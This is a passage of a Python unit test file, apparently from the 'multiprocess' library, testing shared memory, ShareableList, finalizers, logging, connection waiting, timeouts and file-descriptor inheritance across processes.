self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocess.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Verify __repr__
self.assertIn(sms.name, str(sms))
self.assertIn(str(sms.size), str(sms))
# Test pickling
sms.buf[0:6] = b'pickle'
pickled_sms = pickle.dumps(sms)
sms2 = pickle.loads(pickled_sms)
self.assertEqual(sms.name, sms2.name)
self.assertEqual(sms.size, sms2.size)
self.assertEqual(bytes(sms.buf[0:6]), bytes(sms2.buf[0:6]), b'pickle')
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify __repr__
self.assertIn(sl.shm.name, str(sl))
self.assertIn(str(list(sl)), str(sl))
# Index Out of Range (get)
with self.assertRaises(IndexError):
sl[7]
# Index Out of Range (set)
with self.assertRaises(IndexError):
sl[7] = 2
# Assign value without format change (str -> str)
current_format = sl._get_packing_format(0)
sl[0] = 'howdy'
self.assertEqual(current_format, sl._get_packing_format(0))
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocess.' + m for m in modules]
modules.remove('multiprocess.__init__')
modules.append('multiprocess')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocess.popen_fork')
modules.remove('multiprocess.popen_forkserver')
modules.remove('multiprocess.popen_spawn_posix')
else:
modules.remove('multiprocess.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocess.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocess.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocess.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocess.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocess.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocess.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocess.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def _test_flags(self):
import json
# start child process using unusual flags
prog = ('from multiprocess.tests import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
